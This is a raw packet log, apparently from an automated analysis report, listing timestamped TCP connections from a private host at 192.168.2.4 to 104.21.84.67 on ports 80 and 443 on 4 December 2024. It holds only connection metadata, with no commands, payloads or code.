                                                                                                                                                                                  Dec 4, 2024 11:08:59.508143902 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:08:59.607636929 CET8049730104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:08:59.607809067 CET4973080192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:00.772547960 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:00.772618055 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:00.774899960 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:00.774913073 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:00.775126934 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:00.816417933 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:00.822762966 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:00.863327026 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.298079967 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.298510075 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.298537016 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.298568964 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.298599005 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.298657894 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.299278021 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.309695959 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.309755087 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.309767008 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.318061113 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.318113089 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.318128109 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.363279104 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.363296986 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.410173893 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.418157101 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.472780943 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.472799063 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.502904892 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.503051043 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.503060102 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.511850119 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.511907101 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.511914968 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.519860983 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.519913912 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.519923925 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.527245045 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.527299881 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.527307987 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.534626961 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.534702063 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.534713030 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.543107033 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.543157101 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.543164968 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.549880981 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.549932957 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.549941063 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.556710958 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.556761026 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.556768894 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.563766003 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.563813925 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.563821077 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.577682972 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.577734947 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.577743053 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.584683895 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.584738970 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.584747076 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.591736078 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.591787100 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.591794968 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.644648075 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.660213947 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                  Dec 4, 2024 11:09:01.700267076 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.702441931 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.702486992 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.702498913 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.716336012 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.716388941 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.716394901 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.724834919 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.724885941 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.724893093 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.730690002 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.730752945 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.730761051 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.730812073 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.738653898 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.738662958 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.738713980 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.746782064 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.746788979 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.746839046 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.754892111 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.754899979 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.754964113 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.759154081 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.759161949 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.759219885 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.763058901 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.763139963 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.763190985 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.763266087 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.763281107 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:01.763293982 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:01.763298988 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:24.286957026 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:24.286998034 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:24.287089109 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:24.287509918 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:24.287525892 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:25.544766903 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:25.544909954 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:25.548743963 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:25.548772097 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:25.549046993 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:25.567152023 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:25.611336946 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.007627964 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.007705927 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.007803917 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.007833004 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.008141041 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.008194923 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.008203983 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.009084940 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.009131908 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.009140968 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.015882969 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.016007900 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.016026020 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.024260044 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.024317980 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.024326086 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.066440105 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.066447973 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.113337994 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.208728075 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.212546110 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.212639093 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.212660074 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.253952026 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.328658104 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.332401037 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.332462072 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.332479000 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.376040936 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.376086950 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.376118898 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.376141071 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.376179934 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.376230001 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.376291037 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.376339912 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.376348972 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.377162933 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.377212048 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.377217054 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.377230883 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.377269030 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.377994061 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.378930092 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.378962040 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.378971100 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.378978014 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.379020929 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.379026890 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.410089970 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.410238981 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.410255909 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.421206951 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.421314001 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.421331882 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.428657055 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.428733110 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.428750992 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.436146975 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.436191082 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.436196089 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.451291084 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.451297998 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.451348066 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.451354980 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.465989113 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.466033936 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.466039896 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.466087103 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.496581078 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.496680975 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.507494926 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.507503986 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.507555962 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.515110970 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.515122890 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.515166998 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.530335903 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.530344009 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.530394077 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.544955969 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.545037985 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.559886932 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.559972048 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.571521997 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.571594954 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.584995031 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.585159063 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.611869097 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.611954927 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.614124060 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.614180088 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.623845100 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.623898029 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.633384943 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.633435965 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.643232107 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.643285036 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.648149967 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.648211002 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.657908916 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.657963037 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.667633057 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.667691946 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.672629118 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.672682047 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.682399988 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.682463884 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.692081928 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.692138910 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.697127104 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.697182894 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.704617023 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.704668999 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.710222960 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.710279942 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.715833902 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.715892076 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.718787909 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.718839884 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.722934008 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.722985983 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.812690020 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.812885046 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.813659906 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.813726902 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.818774939 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.818830013 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.823195934 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.823250055 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.824975014 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.825027943 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.829121113 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.829230070 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.833029032 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.833086967 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.835319996 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.835369110 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.838634014 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.838682890 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.842331886 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.842381001 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.844089031 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.844145060 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.847481966 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.847534895 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.850941896 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.850999117 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.857896090 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.857906103 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.857940912 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.857975960 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.857990026 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.858000040 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.858026028 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.870306969 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.870323896 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.870376110 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.870385885 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.870420933 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.880592108 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.880610943 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.880691051 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.880706072 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.880747080 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.892502069 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.892527103 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.892563105 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.892570019 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:26.892595053 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:26.892615080 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:27.014348984 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:27.014370918 CET44349739104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:27.014553070 CET49739443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:09:27.014564037 CET44349739104.21.84.67192.168.2.4
